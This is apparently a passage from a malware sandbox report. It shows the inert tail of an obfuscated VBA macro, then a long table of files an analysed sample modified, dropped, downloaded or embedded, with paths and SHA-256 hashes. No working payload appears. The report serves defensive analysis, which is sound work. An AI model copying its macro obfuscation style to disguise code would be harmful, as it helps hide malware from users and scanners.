Dim iKfwKC As Boolean
Case 559
Dim ki2Z4C As Boolean
PiRSrYcC = s8DrPjo
Dim SLpWv3f As Boolean
rVWjwPpm = CVar(fMsdIwM)
Dim zSRwUi As Boolean
hLhaLVlL = 333
Dim PKzCoGJ9 As Boolean
End Select
End If
End Function
c:\users\aetadzjz\appdata\local\gdipfontcachev1.dat | Modified File | Stream |
Unknown
|
...
|
»
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0 | Modified File | Stream |
Unknown
|
...
|
»
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0 | Modified File | Stream |
Unknown
|
...
|
»
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0 | Modified File | Stream |
Unknown
|
...
|
»
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0 | Modified File | Stream |
Unknown
|
...
|
»
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0 | Modified File | Stream |
Unknown
|
...
|
»
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0 | Modified File | Stream |
Unknown
|
...
|
»
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0 | Modified File | Stream |
Unknown
|
...
|
»
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0 | Modified File | Stream |
Unknown
|
...
|
»
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0 | Modified File | Stream |
Unknown
|
...
|
»
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0 | Modified File | Stream |
Unknown
|
...
|
»
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0 | Modified File | Stream |
Unknown
|
...
|
»
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0 | Modified File | Stream |
Unknown
|
...
|
»
c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat | Modified File | Stream |
Unknown
|
...
|
»
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat | Modified File | Stream |
Unknown
|
...
|
»
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\index.dat | Modified File | Stream |
Unknown
|
...
|
»
C:\Users\aETAdzjz\AppData\Local\Temp\DAB4.tmp | Dropped File | Text |
Unknown
|
...
|
»
341cd90f8c92dfb57a29259dbbce1f7912bcb224c03739533a7c48b0b6136a27 | Downloaded File | Stream |
Unknown
|
...
|
»
63cd9558684208eb625be392b439e26a1dd96dce6b42f0f370607e211cf61701 | Downloaded File | Stream |
Unknown
|
...
|
»
693c91a09a3f488fecf1083613b2801b9dcdaae8852dcb76528a9e1a5b7dcfc6 | Downloaded File | Text |
Unknown
|
...
|
»
7e54d08776c5e3a9654eeda765f1553f63587d1daf2f72c64a9cb4b3df80a8c7 | Downloaded File | Text |
Unknown
|
...
|
»
7f241eed2dbb332e873115602713878a4b299164587293683d87a9ba3cbfc9e6 | Downloaded File | Stream |
Unknown
|
...
|
»
8a8fce232b19cfeec3055a89ba0febf2a7d2c2750656e721aa90f1e2db7a5c13 | Downloaded File | Text |
Unknown
|
...
|
»
95dfe0b37fd9b3cf2b2d2db43a743f247900b60e40ec8e001f07fe50ff74b93e | Downloaded File | Stream |
Unknown
|
...
|
»
986aa45d0f79faaf947760cfb589c799b5b97fd3beffc86992b84edd27ab2232 | Downloaded File | Text |
Unknown
|
...
|
»
ba0d301df0b4cfcd48173fb27c4ae8d304fb0d7b86fb50d158b53cbbb72754de | Downloaded File | Stream |
Unknown
|
...
|
»
bba6efe3e341e27d5ec49f32dda0ec1b299bdd43a0eb3b9f22fc4691b1d46ba7 | Downloaded File | Text |
Unknown
|
...
|
»
f9799487143da25f1f8504ae36aa2b7a69ad36b6451873f6a61d46fed6d6126d | Downloaded File | Text |
Unknown
|
...
|
»
07329608263de8c8cdad2e194fca6e7803a548881da4db24e41cdd69dbc871b4 | Embedded File | Unknown |
Unknown
|
...
|
»
09997b149e84517f685df451e3267b2601c147a3e1ad4e1e52be3fcdc6f3e18b | Embedded File | Stream |
Unknown
|
...
|
»
0d1dbe935ca0b78ea59311f806471880d5d18a16f66349d14059b79d54b56bb4 | Embedded File | Stream |
Unknown
|
...
|
»
214ff2171ac273a30e8ec02daab88daec46426d18d02f5a4abcbf9c518eae5b0 | Embedded File | Unknown |
Unknown
|
...
|
»
28900acacec9c89a37ae6c8a47da6bbe5ac283912177382006e3b3b6d823e3ad | Embedded File | Text |
Unknown
|
...
|
»
2ae19fbc53b740e2cc8d11bdc66d50ed24d2069911a0c5f41a53855e8b805b91 | Embedded File | Unknown |
Unknown
|
...
|
»
2e29c8f8040db65ea45dd75d34562dbd9c3f754b80e6b2794f85139c8b756e38 | Embedded File | Unknown |
Unknown
|
...
|
»
3440f3f4b53630789ab73ac494d8e361b1b8f043d828e5011d077abd9cccbccf | Embedded File | Stream |
Unknown
|
...
|
»
34c9c4e0fd5dda17e1d22592e2a7af2b328ab66fb2b1574b3662d34f12ee2fbc | Embedded File | Stream |
Unknown
|
...
|
»
3ae6c7f759b7d73a9fbb1928a34ae0542ee4157a1e516007c03c5322498dc749 | Embedded File | Text |
Unknown
|
...
|
»
3b588b29c4fc75422dcfe00791a217bbcb76317466ec96b14e687ab200e882d6 | Embedded File | Stream |
Unknown
|
...
|
»
3dea61bdd47af594b5d5005543d7c02087cd342a1b1213ee8a0720547d718ce0 | Embedded File | Unknown |
Unknown
|
...
|
»
4491e575ae19c95c8412f752bf519c9e7525d8ad0ddfc5663bb07fc7cb6dcc93 | Embedded File | Stream |
Unknown
|
...
|
»
4ac823705feba084c17a5a483a8828ea14c1d2ac1657abcc5774e5bc7c3b8038 | Embedded File | Unknown |
Unknown
|
...
|
»
6bd568791b559c4100eaacf5c261a080c44cbf73ee65f30bffab4254d8cffa77 | Embedded File | Unknown |
Unknown
|
...
|
»
6e172e2432d980899913952bc1d809e97ea9e9831af67c920d70ed75209273ac | Embedded File | Unknown |
Unknown
|
...
|
»
6ffe28ce12f5e31cb4fd45a185e27e59aadd3565d8b116c6f66064c521d33d16 | Embedded File | Unknown |
Unknown
|
...
|
»
71301c44d3243c69e8ee1fd2ec4a7420155104e1e86ec448c7438cedb26ba1bf | Embedded File | Unknown |
Unknown
|
...
|
»
75beb1ef7b8f1757da52003a4e930ae5fd9634f8fbcfca334c178750e447258c | Embedded File | Unknown |
Unknown
|
...
|
»
7e0510fabc1a9bb0784b8c732ef5db10759b73b9197b10bd95cf8391b5450069 | Embedded File | Stream |
Unknown
|
...
|
»
804e5bcc70aeb3315d3aa2a92955407bc8561950093cb82b9917abd4bd95bbf9 | Embedded File | Unknown |
Unknown
|
...
|
»
819e8ca7169cf15da01e4258812de14ab8ef31a5b4dffb274f71f075ff7d9c63 | Embedded File | Stream |
Unknown
|
...
|
»
874a5731ed6f443b696764ea5a0d3f7b5c21aaa501fcf9a4ce260d0c4bd93604 | Embedded File | Stream |
Unknown
|
...
|
»
88209f45714c5235ae6875b08da281be3128f6a713b7efeb5f30299d04d1ff31 | Embedded File | Stream |
Unknown
|
...
|
»
8e942a659d21f31aa8a98d72628195c972fd36ff7503ac1184748f704ad547dd | Embedded File | Unknown |
Unknown
|
...
|
»
8f22166c75294f73909b23685074f4043183103c72e7764e5858f21c580da295 | Embedded File | Text |
Unknown
|
...
|
»
91ec5a600c16578831e8bfdac64a0b814753c8173ace7c328f83d1fd7ba8bf6c | Embedded File | Stream |
Unknown
|
...
|
»
97200b000a5a345a6e1c2d70a57ee637e1bc3174f284e7dc8c67bfc76dd06319 | Embedded File | Stream |
Unknown
|
...
|
»
99888476b613dd4771c504b5f49dbfe43e5e1f2346eb0e850bdba058b0010179 | Embedded File | Unknown |
Unknown
|
...
|
»
9df006819819494491f22604390591f820ec37fcb630d82cc9275ef849cb09af | Embedded File | Unknown |
Unknown
|
...
|
»
a42086a5c3b1f6d076ece89c2c8e7d276803ca6927840d6ea0d7e5a47ea42821 | Embedded File | Unknown |
Unknown
|
...
|
»
a663c6620ad9816b21517ff782e566e70e5e50238d594faf7fc59256ae2f14cc | Embedded File | Unknown |
Unknown
|
...
|
»
aff0c7199f245f9798d3edf24e5669b29c1713f8e2a23339d65a6ddb7e950001 | Embedded File | Unknown |
Unknown
|
...
|
»
b37bd84d01662fad53176f79b9d059f9430c1379a76dd835827ec46cda7b81d0 | Embedded File | Stream |
Unknown
|
...
|
»
cd1c17cb6b27faf6bc034741583310a98048e89349fd6fdd5cacd4404f579d95 | Embedded File | Stream |
Unknown
|
...
|
»
ce264f2875e6cbbd9db06064c7a85399589b89fc11f46aafb20ff09acfd00ca9 | Embedded File | Stream |
Unknown
|
...
|
»
d0ac2f2f16e4d12159562843cc00cc7cd28fba5004b16595e606249658f14d16 | Embedded File | Stream |
Unknown
|
...
|
»
e3cbed5319540d4147276610adcb856a1b1ed272760e3443aa3eea64b0957097 | Embedded File | Stream |
Unknown
|
...
|
»
e719dfce693d850c04b7f6f7ecfb5d02d9e574ae4fefe69e4ede4d9008691618 | Embedded File | Stream |
Unknown
|
...
|
»
e7d44ae3109d7380fecac8b1df2ad88b462422f728b4934c7719f30f53da1d18 | Embedded File | Stream |
Unknown
|
...
|
»
ea874ae5689f68098178e567551c1212a6b80d41e2c0f0793ae4b4a813864599 | Embedded File | Stream |
Unknown
|
...
|
»
efe1aff29bfe2a9f185c1da6dd454d361edb14359dc9b883467e38171119d213 | Embedded File | Unknown |
Unknown
|
...
|
»
f2da6697a603ee61c6cdab3294b15e0a4e9e69c97d6ebb79eae14a43a6aa80cb | Embedded File | Unknown |
Unknown
|
...
|
»
f50788fc4e2f8f6bc2df766b8851c295054fea0de34af342454e6f392617913a | Embedded File | Unknown |
Unknown
|
...
|
»